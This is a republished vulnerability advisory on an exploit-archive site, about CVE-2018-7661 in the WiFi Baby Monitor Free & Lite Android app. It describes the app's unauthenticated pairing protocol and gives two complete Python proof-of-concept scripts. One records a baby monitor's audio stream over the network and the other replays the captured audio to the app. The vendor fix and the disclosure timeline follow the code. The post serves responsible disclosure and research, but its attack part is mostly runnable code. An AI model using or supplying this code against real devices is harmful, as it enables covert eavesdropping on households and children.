首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
来源:vfocus.net 作者:iamrastating 发布时间:2018-03-06  
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
 
Monitoring the traffic using Wireshark during the pairing process revealed:
 
- The initial connection is made on port 8257
- To start the pairing process, the same sequence is sent each time
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
 
## Abusing The Protocol to Record Audio
 
With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
 
The [very hacky] proof of concept code can be found below:
 
```
import socket
import sys
import time
 
if len(sys.argv) < 2:
    print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
    exit(1)
 
target = sys.argv[1]
port = 8257
 
if len(sys.argv) == 3:
    port = int(sys.argv[2])
 
s = socket.socket()
s.connect((target, port))
s.send('\x01')
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
       '\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
       '\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
       '\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
       '\x33')
 
heartbeat_dump = open('dump.heartbeat.bin', 'wb')
data_dump = open('dump.data.bin', 'wb')
 
has_data_socket = False
data_socket = socket.socket()
delta = 0
 
while True:
    time.sleep(1)
    data = s.recv(2048)
    if data is not None:
        heartbeat_dump.write(data)
        print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
        s.send('\x01')
 
    if has_data_socket:
        data = data_socket.recv(2048)
        if data is not None:
            data_dump.write(data)
            print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
            data_socket.send('\x01')
    else:
        print '[*] Establishing data connection'
        data_socket.connect((target, 8258))
        data_socket.send('\x01')
        data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
        has_data_socket = True
        print '[*] Established data connection'
 
    delta += 1
 
heartbeat_dump.close
data_dump.close
```
 
This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
 
Replaying the Recordings
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
 
```
import socket
import sys
import time
 
s = socket.socket()
s.bind(('0.0.0.0', 8257))
s.listen(5)
print '[*] Heartbeat socket listening on port 8257'
 
data_socket = socket.socket()
data_socket.bind(('0.0.0.0', 8258))
data_socket.listen(5)
print '[*] Data socket listening on port 8258'
 
data = ''
with open('dump.heartbeat.bin', 'r') as replay_file:
    data = replay_file.read()
 
wav_data = ''
with open('dump.data.bin', 'r') as wav_file:
    wav_data = wav_file.read()
 
c, addr = s.accept()
print '[*] Connection from {client}'.format(client = addr)
c.send(data)
 
data_connection, addr = data_socket.accept()
print '[*] Data connection from {client}'.format(client = addr)
data_connection.send(wav_data)
 
buf_start = 0
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
buf = wav_data[buf_start:buf_end]
 
while buf is not None:
    c.send('\x01')
    print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
    data_connection.send(buf)
    time.sleep(0.1)
 
    if buf_end == -1 or buf_start == -1:
        buf = None
    else:
        buf_start = buf_end
        buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
        if buf_end == -1:
            buf = wav_data[buf_start:]
        else:
            buf = wav_data[buf_start:buf_end]
 
data_connection.close()
c.close()
print '[*] Connection closed'
```
 
A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
 
https://vimeo.com/258487598
 
## Solution
 
When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
 
To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
 
## CVE-ID
 
CVE-2018-7661
 
## CVSS Score
 
CVSS Base Score: 5.9
Impact Subscore: 4.2
Exploitability Subscore: 1.6
CVSS Temporal Score: 5.3
Overall CVSS Score: 5.3
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
 
## Disclosure Timeline
 
2018-02-11: Initial contact with vendor to make them aware of the attack vector
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
2018-02-16: Vendor begins roll-out process for the new update
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NETGEAR Magic telnetd Enabler
·Xion 1.0.125 - '.m3u' Local SE
·DualDesk 20 - 'Proxy.exe' Deni
·Dup Scout Enterprise 10.5.12 -
·SEGGER embOS/IP FTP Server 3.2
·Sophos UTM 9.410 - 'loginuser'
·IrfanView 4.50 Email Plugin -
·ActivePDF Toolkit < 8.1.0.1902
·IrfanView 4.44 Email Plugin -
·Tenda AC15 Router - Pe-authent
·ActivePDF Toolkit Code Executi
·Memcached - 'memcrashed' Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved